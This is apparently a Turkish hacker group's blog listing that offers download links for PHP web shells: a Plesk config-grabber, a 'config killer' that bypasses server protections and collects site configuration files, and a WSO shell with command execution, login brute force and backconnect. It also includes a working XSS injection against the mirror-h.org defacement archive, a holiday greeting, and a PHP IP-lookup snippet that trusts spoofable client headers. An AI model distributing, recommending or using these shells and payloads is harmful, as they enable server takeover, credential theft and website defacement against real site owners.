vhosts config shell

XBaha Hacker tarafından kodlanan vhosts config shell vhosts yani plesk sunucuların configlerini çekmenizi sağlar Özel bir htaccess ile hazırlanan bu shell çoğu vhosts sunucunun configlerini çekebilir. Preview : https://underfamily.org/shells/vhosts.php Download(TXT) : https://underfamily.org/shells/vhosts.txt


Config killer shell

Team Indishell tarafından yapılan config killer shell litespeed ve apache sunucularda çoğu sunucuyu bypasslamasıyla tanınmıştır Ek olarak bypass için php.ini oluşturmakta ve username getirerek configleri dizine yazabilmektedir. Preview : https://underfamily.org/shells/configkiller.php Download(TXT) : https://underfamily.org/shells/configkiller.txt


Wso shell

Dünya geneli olarak çoğu defacerin kullandığı wso shell sizlere yeni tasarımı ve özellikleri ile underfamily olarak sunuluyor Özellikler bakımından zengin olan bu shell ; File manager, exec, sql manager, php tools, lfi, php execution, safe mode bypass, string tools(base64 vb.), login brute force, backconnect network özelliklerine sahiptir. Preview : https://underfamily.org/shells/wso.php Download(TXT) : https://underfamily.org/shells/wso.txt


29 Ekim CUMHURİYET Bayramı

29 Ekim CUMHURİYET Bayramımızı en içten dileklerle underfamily.org olarak KUTLARIZ. Efendiler yarın cumhuriyeti ilan ediceğiz -MKA 1923 yılında Türkiye Büyük Millet Meclisi tarafından ülkenin yönetim biçimi olan Cumhuriyet ilan edildi. Her yıl, yurt genelinde ve Kuzey Kıbrıs’ta coşku ile Cumhuriyet Bayramı kutlamaları yapılmaktadır. Mustafa Kemal Atatürk tarafından 29 Ekim 1923’te  TBMM’ye sunulan Anayasa Değişikliği teklifi…


Sosyal medya hesaplarımız

https://twitter.com/OPUnderFamily https://github.com/underfamily Başka hesaplara taviz vermeyiniz gerekli hesap açılırsa buradan paylaşılır.


CloudFlare korumalı sitede ip adresi almak

Underfamily olarak sizlere cloud flare korumalı sitelerde ip adresi engelleniyor bildiğiniz üzere REMOTE_ADDR şeklinde alırsak ip cloudflare koruması ile çıkarılıyor. function GetIP(){ if(getenv(“HTTP_CLIENT_IP”)) { $ip = getenv(“HTTP_CLIENT_IP”); } elseif(getenv(“HTTP_X_FORWARDED_FOR”)) { $ip = getenv(“HTTP_X_FORWARDED_FOR”); if (strstr($ip, ‘,’)) { $tmp = explode (‘,’, $ip); $ip = trim($tmp[0]); } } else { $ip = getenv(“REMOTE_ADDR”); } return $ip;…


Php ile xss engelleme

Çoğu türk sitesinde karşılaştığımız xss açığı veri ekleme bölümlerin de kullanılınca ileri boyutta bir açık haline geliyor. Size şöyle anlatayım ki veri ekleme yani sql verisi ekleme veya $_GET veya $_POST eklenen sql verisinde form’dan gelen veriyi sqle html engellemeden geçiriyorsa veya veri htmlspecialchars tagı altında gösterilmiyorsa bu ciddi bir açık haline geliyor. Örnek olarak…


Mirror-h xss vulnerability

Multiple zone alma bölümünde gerçekleştirilen javascript işlemlerinde çıkan sonuçta html çalıştırılabiliyor. www.mirror-h.org/multiple/ adresine girelim sitelerin olduğu textarea’ya yazalım ; </textarea><h1>underfamily.org</h1> Bu şekilde sonuç alacağız xss vuln başarılıdır.